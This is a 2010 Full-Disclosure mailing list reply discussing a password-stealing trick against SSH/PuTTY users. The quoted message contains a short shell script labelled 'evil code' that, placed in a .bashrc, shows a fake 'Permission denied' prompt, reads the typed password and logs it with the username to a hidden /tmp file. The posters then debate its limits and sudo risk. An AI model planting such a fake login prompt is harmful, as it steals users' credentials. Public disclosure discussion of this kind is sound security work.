[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] PuTTY private key passphrase stealing attack
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] PuTTY private key passphrase stealing attack
- From: Joachim Schipper <joachim@xxxxxxxxxxxxxxxxxx>
- Date: Wed, 2 Jun 2010 21:41:28 +0200
On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote:
> all controls like MOTD can be bypassed ...
>
> =========edited script=====
> # evil code
> mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
> mUn=`whoami`
> mSttyVal=`stty -g`
> echo -en "Permission denied, please try again.\n"
> echo -en "$mUn@$mIP's password:"
> stty -echo
> read password
> echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log
> echo -en "\n"
> stty $mSttyVal
> ==================end snippet========
>
>
> Apart from this, we already need to have root access to replace any .bashrc
> file ... this is not really an attack but a social engineering attack ....
> if we had root access we could attach sshd to the strace and get any
> password etc all details ....
But note that someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.
It's a bit of a stretch, but not impossible.
Joachim
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/